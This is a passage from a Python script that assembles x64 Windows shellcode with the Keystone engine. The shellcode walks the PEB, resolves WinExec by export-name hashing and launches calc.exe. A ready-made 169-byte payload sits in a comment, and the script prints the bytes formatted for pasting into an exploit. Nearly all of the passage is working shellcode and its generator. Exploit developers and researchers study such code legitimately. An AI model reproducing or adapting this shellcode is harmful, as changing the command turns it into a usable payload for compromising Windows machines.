" mov rcx, 0x6578652e636c6163;" # exe.clac
" push rcx;"
" lea rcx, [rsp];" # Address of the string as the 1st argument lpCmdLine
" xor rdx,rdx;"
" inc rdx;" # uCmdShow=1 as the 2nd argument
" sub rsp, 0x28;"
" call rax;" # WinExec
)
# Payload size: 169 bytes
# buf = b"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d"
# buf += b"\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01"
# buf += b"\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01"
# buf += b"\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31"
# buf += b"\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45"
# buf += b"\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b"
# buf += b"\x04\x8b\x4c\x01\xc8\xc3\xc3\x41\xb8\x98\xfe\x8a\x0e\xe8\x92\xff\xff\xff\x48\x31"
# buf += b"\xc9\x51\x48\xb9\x63\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x8d\x0c\x24\x48\x31\xd2"
# buf += b"\x48\xff\xc2\x48\x83\xec\x28\xff\xd0"
ks = Ks(KS_ARCH_X86, KS_MODE_64)
encoding, count = ks.asm(CODE)
print("%d instructions..." % count)
sh = b""
for e in encoding:
sh += struct.pack("B", e)
shellcode = bytearray(sh)
sc = ""
print("Payload size: "+str(len(encoding))+" bytes")
counter = 0
sc = "buf = b\""
for dec in encoding:
if counter % 20 == 0 and counter != 0:
sc += "\"\nbuf += b\""
sc += "\\x{0:02x}".format(int(dec))
counter += 1
if count % 20 > 0:
sc += "\""
print(sc)
print("Payload size: "+str(len(encoding))+" bytes")